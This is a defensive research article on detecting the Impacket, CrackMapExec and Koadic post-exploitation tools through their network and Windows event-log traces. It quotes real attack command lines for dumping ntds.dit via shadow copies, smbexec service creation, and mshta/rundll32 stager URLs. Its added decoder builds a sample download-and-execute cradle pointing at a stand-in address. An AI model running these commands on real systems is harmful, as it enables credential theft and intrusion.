The number of attacks on the corporate sector grows every year. For example,

Note that these tools are used not for the initial intrusion but for developing an attack inside the infrastructure: attackers use them at various stages of an attack after the perimeter has been breached. Such activity is hard to detect and, in most cases, is caught only with dedicated detection technology.

What we needed to do:
- Understand how the hacking tools work: find out what an attacker has to abuse and which technologies they can use.
- Find what security tools fail to detect in the first stages of an attack. The reconnaissance phase may be skipped altogether, either because the attacker is an insider or because they exploit a weakness in the infrastructure that was not known before. It then becomes possible to reconstruct the entire chain of their actions, hence the desire to detect further movement.
- Eliminate false positives from intrusion detection tools. Detecting particular actions on the basis of reconnaissance alone is error-prone: an infrastructure usually offers enough ways to obtain a given piece of information that are, at first glance, indistinguishable from legitimate ones.

What do these tools give an attacker? In the case of Impacket, a large library of modules that can be used at various stages of an attack after the perimeter has been breached. Many tools use Impacket modules internally; Metasploit, for example, has dcomexec and wmiexec for remote command execution and secretsdump for extracting credentials from memory, all taken from Impacket. As a result, correctly detecting the activity of such a library also ensures detection of its derivatives.

It is no coincidence that the authors of CrackMapExec (or simply CME) describe it as "Powered by Impacket". CME also ships ready-made functionality for popular scenarios: Mimikatz for obtaining passwords or their hashes, implementations of the Meterpreter or Empire agent for remote execution, and Bloodhound on board.

The third tool we chose is Koadic. It is fairly recent, presented at the international hacker conference DEF CON 25 in 2017, and stands out for its unusual approach: it works over HTTP using JavaScript and Microsoft Visual Basic Script (VBS). This approach is called living off the land: the tool relies on a set of dependencies and libraries built into Windows. Its authors call it COM Command & Control (C3).
Impacket

Impacket's functionality is very broad: from reconnaissance inside AD and collecting data from internal MS SQL servers, to techniques for obtaining credentials (an SMB relay attack, or retrieving the ntds.dit file with user password hashes from a domain controller). Impacket also executes commands remotely by four different methods: WMI, the Windows Task Scheduler service, DCOM and SMB. All of them require credentials.

Secretsdump

Let's look at secretsdump. This module can target both user workstations and domain controllers. It is used to obtain copies of the LSA secrets, the SAM and SECURITY hives and the NTDS.dit file, so it can show up at different stages of an attack. The module's first step is authentication over SMB, which needs either the user's password or its hash; in the latter case a Pass the Hash attack is performed automatically. Next come a request to open the Service Control Manager (SCM) and a request for registry access over the winreg protocol, through which the attacker reads the registry branches of interest and then retrieves the result over SMB.

Fig. 1 shows how access to the registry key holding the LSA data is obtained over the winreg protocol: a DCERPC call with opnum 15, OpenKey (BaseRegOpenKey in MS-RRP).

Fig. 1. Opening a registry key over the winreg protocol

Once the key is open, its values are saved with the SaveKey call, opnum 20 (BaseRegSaveKey). Impacket does this in a very specific way: the values are written to a file whose name is a string of 8 random characters followed by .tmp. The file is then fetched from the System32 directory over SMB (Fig. 2).

Fig. 2. How a registry key is retrieved from a remote machine

So this activity can be detected on the network by queries to particular registry branches over the winreg protocol, by the specific names and calls involved, and by their order.

The module also leaves traces in the Windows event log, which makes it easy to detect. For example, running the command

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

produces the following key sequence of events in a Windows Server 2016 log (the command lines in 4688 are recorded only when process creation auditing includes the command line, and 5145 requires Detailed File Share auditing):

1. 4624 - remote logon.
2. 5145 - access check for the winreg remote service.
3. 5145 - access check for a file in the System32 directory; the file has the random name described above.
4. 4688 - a cmd.exe process is created that launches vssadmin:
"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
5. 4688 - a process is created with the command:
"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
6. 4688 - a process is created with the command:
"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
7. 4688 - a process is created with the command:
"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
Smbexec

Like many post-exploitation tools, Impacket has modules for remote command execution. We will focus on smbexec, which provides an interactive command shell on the remote machine. This module also requires SMB authentication with a password or its hash. Fig. 3 shows an example of how such a tool works; in this case it is a local administrator console.

Fig. 3. Interactive smbexec console

After authentication, smbexec's first step is to open the SCM with the OpenSCManagerW call (opnum 15). The request is notable: its MachineName field is DUMMY.

Fig. 4. Request to open the Service Control Manager

Next, a service is created with the CreateServiceW call (opnum 12). With smbexec the same command construction logic is seen every time. In Fig. 5, green marks the command parameters that cannot be changed and yellow the ones the attacker can change. Clearly the executable name, its directory and the output file name can be changed, but the rest is very hard to change without breaking the logic of the Impacket module.

Fig. 5. Request to create a service via the Service Control Manager

Smbexec also leaves obvious traces in the Windows event log. For an interactive shell in which the ipconfig command is run, a Windows Server 2016 log records the following key sequence of events:

1. 4697 - a service is installed on the victim's machine:
%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
2. 4688 - a cmd.exe process is created with the arguments from step 1.
3. 5145 - access check for the __output file on the C$ share.
4. 4697 - a service is installed on the victim's machine:
%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
5. 4688 - a cmd.exe process is created with the arguments from step 4.
6. 5145 - access check for the __output file on the C$ share.

Impacket is the foundation on which attack tools are built. It supports almost every protocol in a Windows infrastructure while having characteristic features of its own: specific winreg requests, use of the SCM API with a characteristic command format, the file-name format, and the System32 directory reached over an SMB share.
CrackMapExec

The CME tool is designed primarily to automate the routine actions an attacker has to perform to move through a network. It can work together with the well-known Empire agent and Meterpreter. To execute commands covertly, CME can obfuscate them. With Bloodhound (a separate reconnaissance tool), an attacker can automate the search for active domain administrator sessions.

Bloodhound

Bloodhound as a standalone tool enables advanced reconnaissance inside a network. It collects data about users, machines, groups and sessions and is supplied as a PowerShell script or a binary. LDAP- or SMB-based protocols are used to collect the information. The CME integration module downloads Bloodhound to the victim's machine, runs it and receives the collected data afterwards, which automates the actions in the system and makes them less noticeable. The Bloodhound graphical shell presents the collected data as a graph, which lets the attacker find the shortest path from their machine to a domain administrator.

Fig. 6. Bloodhound interface

To run on the victim's machine, the module creates a task using ATSVC and SMB. ATSVC is the interface for working with the Windows Task Scheduler; CME uses its NetrJobAdd function to create a task over the network. Fig. 7 shows an example of what the CME module sends: a cmd.exe invocation with the obfuscated code passed as arguments, in XML format.

Fig. 7. Creating a task via CME

Once the task is submitted for execution, the victim's machine launches Bloodhound itself, and this is visible in the traffic. The module is characterized by LDAP queries that obtain the standard groups and the list of all machines and users in the domain, and by retrieving information about active user sessions through the SRVSVC NetSessEnum request.

Fig. 8. Retrieving the list of active sessions over SMB

Additionally, when auditing is enabled on the victim's machine, launching Bloodhound produces an event with ID 4688 (process creation) and the process name «C:\Windows\System32\cmd.exe». The command-line arguments deserve attention:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "
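To show what that command line does, here is an added Python decoder (our own example, not part of the article or of CME). Two tricks make the launcher look opaque: `$env:COMSPEC[4,26,25] -join ''` indexes the path of cmd.exe to spell "iex" (Invoke-Expression), and the real script is hidden as a `[char[]]` array of code points joined into a string. The sample launcher is constructed by the script itself from a made-up download cradle, because the article elides the real character array; the payload and the 192.0.2.10 address are assumptions for the example, not anything CME ships.

```python
import re

DEFAULT_COMSPEC = r"C:\WINDOWS\system32\cmd.exe"

# Markers of the logged launcher: the PowerShell flags, the $env:COMSPEC index
# trick (picking letters out of the cmd.exe path to spell "iex") and the
# [char[]](...) -join '' array that hides the real script.
FLAGS = re.compile(r"-exec bypass -noni -nop -w 1 -C", re.IGNORECASE)
COMSPEC_TRICK = re.compile(r"\$env:comspec\[([\d,\s]+)\]\s*-join\s*''", re.IGNORECASE)
CHAR_ARRAY = re.compile(r"\[char\[\]\]\(([\d,\s]+)\)\s*-join\s*''", re.IGNORECASE)


def resolve_comspec_indices(indices, comspec=DEFAULT_COMSPEC):
    """Spell the word PowerShell builds from $env:COMSPEC[i,j,k] -join ''.
    With the default path, [4,26,25] picks 'I','e','x' -> "Iex", i.e.
    Invoke-Expression (PowerShell resolves command names case-insensitively)."""
    return "".join(comspec[i] for i in indices)


def decode_launcher(cmdline, comspec=DEFAULT_COMSPEC):
    """Return {'invoker': ..., 'payload': ...} for a CME-style obfuscated
    PowerShell launcher, or None when the line lacks its markers."""
    if not FLAGS.search(cmdline):
        return None
    trick, chars = COMSPEC_TRICK.search(cmdline), CHAR_ARRAY.search(cmdline)
    if not (trick and chars):
        return None
    indices = [int(n) for n in trick.group(1).split(",")]
    codes = [int(n) for n in chars.group(1).split(",")]
    return {
        "invoker": resolve_comspec_indices(indices, comspec),
        "payload": "".join(chr(c) for c in codes),
    }


def build_launcher(payload):
    """Produce a launcher in the shape of the 4688 line above. This is our own
    constructed sample (the article elides the real char array); it exists
    only so the decoder has realistic input to work on offline."""
    codes = " , ".join(str(ord(c)) for c in payload)
    return (
        "cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "
        "\" & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](" + codes + " )-jOIN'' ) \""
    )


# Constructed payload: a download cradle pointing at a documentation-only
# address (assumption for the example), not anything CME or Bloodhound ships.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"

if __name__ == "__main__":
    line = build_launcher(SAMPLE_PAYLOAD)
    print(line)
    print(decode_launcher(line))
```

The COMSPEC indices resolve against the target's real %COMSPEC%. On most installs that is C:\WINDOWS\system32\cmd.exe or C:\Windows\system32\cmd.exe; either way positions 4, 26 and 25 yield I/i, e, x, which is why the trick is portable and why a detection should key on the `$env:COMSPEC[` indexing itself rather than on the literal string "iex".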
Enum_avproducts

The enum_avproducts module is very interesting in terms of both functionality and implementation. WMI lets you use the WQL query language to fetch data from various Windows objects, and that is essentially what this CME module does. It issues queries to the AntiSpywareProduct and AntiVirusProduct classes about the protection tools installed on the victim's machine. To get the data, the module connects to the root\SecurityCenter2 namespace, then generates a WQL query and receives the response. Fig. 9 shows the contents of such a request and response; in this example, Windows Defender was found.

Fig. 9. Network activity of the enum_avproducts module

WMI auditing (the WMI-Activity trace log), whose events carry useful information about WQL queries, is often disabled. But when it is enabled, running the enum_avproducts script records an event with ID 11 containing the name of the user who sent the request and the root\SecurityCenter2 namespace name.

Each CME module had artifacts of its own: specific WQL queries, creation of a particular kind of Task Scheduler task with obfuscation, and the Bloodhound-specific activity in LDAP and SMB.
Koadic

Koadic's distinctive feature is its use of the JavaScript and VBScript interpreters built into Windows. In this sense it follows the living off the land trend: it has no external dependencies and uses standard Windows tools. It is a fully fledged Command & Control (CnC) tool: after infection an "implant" is installed on the machine, through which it can be controlled. Such a machine is called a "zombie" in Koadic terminology. If the privileges on the victim's side are insufficient for full operation, Koadic can raise them with User Account Control bypass (UAC bypass) techniques.

Fig. 10. Koadic shell

The victim has to initiate communication with the Command & Control server. To do so, it contacts a pre-prepared URI and receives the main body of Koadic through one of the stagers. Fig. 11 shows an example with the mshta stager.

Fig. 11. Initializing a session with the CnC server

The WS variable in the response shows that execution happens through WScript.Shell, and the STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH and EXPIRE variables hold the key parameters of the current session. This is the first request/response pair in the HTTP connection with the CnC server. Subsequent requests relate directly to the functionality of the modules (implants) being invoked. All Koadic modules work only within an active session with the CnC.

Mimikatz

Just as CME works with Bloodhound, Koadic works with Mimikatz as a separate program and has several ways of launching it. Below is a request/response pair for loading the Mimikatz implant.

Fig. 12. Delivering Mimikatz to Koadic

Notice how the URI format of the request has changed: it now carries a value for the csrf variable, which is responsible for the selected module. Do not be misled by its name; CSRF is usually understood quite differently. The response is the same Koadic body with Mimikatz-related code appended. It is quite large, so let's look at the key points: the base64-encoded Mimikatz library, a serialized .NET class that injects it, and the arguments for launching Mimikatz. The result of execution is sent over the network in clear text.

Fig. 13. Result of running Mimikatz on the remote machine

Exec_cmd

Koadic has modules for executing commands remotely. Here we see the same URI construction and the familiar sid and csrf variables. For the exec_cmd module, code capable of running shell commands is appended to the body. Below is the code contained in the CnC server's HTTP response.

Fig. 14. Code of the exec_cmd implant

The GAWTUUGCFI variable, with the familiar WS attribute, is what the code needs in order to run. With it the implant calls the shell, handling two code branches: shell.exec, which returns the output stream, and shell.run, which does not.

Koadic is not a typical tool, but it has artifacts of its own by which it can be found in legitimate traffic:
- a specific shape of HTTP requests,
- use of the WinHttpRequest API,
- creation of a WScript.Shell object via ActiveXObject,
- a large executable body.

The initial connection is started by a stager, so its activity can be detected through Windows events. For mshta this is event 4688, showing creation of a process with the following start attribute:

C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6

While Koadic runs, other 4688 events appear with attributes that characterize it perfectly:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
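As an added example (not the article's or Koadic's code), the Python script below turns the 4688 fingerprints above into a classifier for a host's process-creation command lines and correlates them: the stager URL, the sid/csrf pair of each session, the commands wrapped by exec_cmd, and the URI path that the same listener reuses across stages. The sample lines are the ones quoted above plus one ordinary cmd.exe call as a control.

```python
import re
from urllib.parse import urlsplit

# Three process-creation shapes quoted above: the mshta stager fetching the
# body, rundll32 re-entering via mshtml,RunHTMLApplication with sid/csrf in the
# URI, and the exec_cmd implant's cmd.exe wrapper writing to a GUID-named file.
MSHTA = re.compile(r"mshta\.exe\s+(?P<url>https?://\S+)", re.IGNORECASE)
RUNDLL = re.compile(
    r"rundll32\.exe\s+(?P<url>https?://[^?\s]+)\?sid=(?P<sid>[0-9a-f]{32});\s*"
    r"csrf=(?P<csrf>[0-9a-f]*);.*mshtml,RunHTMLApplication",
    re.IGNORECASE,
)
EXEC_CMD = re.compile(
    r'cmd\.exe"?\s+/q /c chcp 437 & (?P<inner>.+?) 1> '
    r"(?P<out>\S+\\[0-9a-f-]{36}\.txt) 2>&1$",
    re.IGNORECASE,
)


def classify(cmdline):
    """Map one 4688 command line to a Koadic stage, or None if it matches
    none of the three shapes."""
    m = MSHTA.search(cmdline)
    if m:
        return {"stage": "stager", "url": m.group("url")}
    m = RUNDLL.search(cmdline)
    if m:
        return {"stage": "session", "url": m.group("url"),
                "sid": m.group("sid"), "csrf": m.group("csrf")}
    m = EXEC_CMD.search(cmdline)
    if m:
        return {"stage": "exec_cmd", "command": m.group("inner"),
                "output": m.group("out")}
    return None


def summarize(cmdlines):
    """Correlate a host's 4688 lines: stager URLs, sid -> csrf per session, the
    commands run through exec_cmd, and the URI paths seen (one Koadic listener
    keeps the same path across stager and session requests)."""
    out = {"stagers": [], "sessions": {}, "commands": [], "paths": set()}
    for line in cmdlines:
        hit = classify(line)
        if hit is None:
            continue
        if hit["stage"] == "stager":
            out["stagers"].append(hit["url"])
        elif hit["stage"] == "session":
            out["sessions"][hit["sid"]] = hit["csrf"]
        else:
            out["commands"].append(hit["command"])
        if "url" in hit:
            out["paths"].add(urlsplit(hit["url"]).path)
    return out


# Sample input: the five 4688 entries quoted above, plus one ordinary cmd.exe
# call added as a control (it must not match).
SAMPLE_4688 = [
    r"C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6",
    r"rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication",
    r"rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication",
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1',
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1',
    r'"C:\Windows\system32\cmd.exe" /c ipconfig',
]

if __name__ == "__main__":
    for line in SAMPLE_4688:
        print(classify(line))
    print(summarize(SAMPLE_4688))
```

The session line with an empty csrf value is the first contact (no module selected yet), which is why the regex allows zero hex digits there; an operator hunting in bulk can pivot from the shared URI path and the fixed port to every host that talked to the same listener.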
Conclusion

The living off the land trend is gaining popularity among criminals: they use the tools and mechanisms built into Windows for their purposes. The popular tools Koadic, CrackMapExec and Impacket, which follow this principle, appear more and more often in APT reports. The number of forks of these tools on GitHub keeps growing and new ones keep appearing (there are already about a thousand). The trend owes its popularity to its simplicity: attackers need no third-party tools, since what they need is already on the victim's machine and helps them evade security controls. Our focus is the study of network communication: each of the tools described above leaves traces of its own in network traffic, and studying them in detail has allowed us to teach our product to detect them.

Authors:
- Anton Tyurin, Head of Expert Services, PT Expert Security Center, Positive Technologies
- Egor Podmokov, expert, PT Expert Security Center, Positive Technologies

Source: habr.com